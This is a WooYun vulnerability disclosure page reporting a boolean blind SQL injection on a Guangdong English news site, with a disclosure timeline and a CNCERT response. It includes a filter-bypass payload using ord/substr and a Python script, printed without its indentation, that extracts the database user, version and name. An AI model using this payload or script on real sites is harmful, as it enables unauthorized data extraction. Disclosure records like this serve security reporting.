当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133529

漏洞标题:南方英文网分站广东新闻英文网布尔类型盲注(附脚本)

相关厂商:cncert国家互联网应急中心

漏洞作者: 渔村安全实验室

提交时间:2015-08-15 22:39

修复时间:2015-10-02 09:54

公开时间:2015-10-02 09:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-15: 细节已通知厂商并且等待厂商处理中
2015-08-18: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-28: 细节向核心白帽子及相关领域专家公开
2015-09-07: 细节向普通白帽子公开
2015-09-17: 细节向实习白帽子公开
2015-10-02: 细节向公众公开

简要描述:

详细说明:

http://**.**.**.**/culture.php?act=article&id=550
注入参数: id

2015-08-12_091428.png


2015-08-12_091545.png


布尔类型的注入,但网站过滤了ascii,mid等。
这样的话就找相同功能的其他函数试试ord跟substr来代替
写个脚本猜解下user,version,database

2015-08-12_091940.png


脚本写得很龊

import requests
import os
database_len = 15
version_len = 5
user_len = 19
url = u'http://**.**.**.**/culture.php?act=article&id=550 and ord(substr(%s,%d,1)) < %d'
index = 1
temp = ''
while index <= user_len:
test_num = 200
while test_num:
oper = requests.get(url % (u'user()', index, test_num))
if oper.status_code is 200:
if len(oper.content) < 11528:
temp += chr(test_num)
print temp
break
test_num -= 1
index += 1
print 'user:%s\n' % temp
index = 1
temp = ''
while index <= version_len:
test_num = 128
while test_num:
oper = requests.get(url % (u'version()', index, test_num))
if oper.status_code is 200:
if len(oper.content) < 11538:
temp += chr(test_num)
print temp
break
test_num -= 1
index += 1
print 'version:%s\n' % temp
index = 1
temp = ''
while index <= database_len:
test_num = 128
while test_num:
oper = requests.get(url % (u'database()', index, test_num))
if oper.status_code is 200:
if len(oper.content) < 11542:
temp += chr(test_num)
print temp
break
test_num -= 1
index += 1
print 'database:%s\n' % temp
os.system('pause')

漏洞证明:

修复方案:

版权声明:转载请注明来源 渔村安全实验室@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-18 09:52

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给广东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无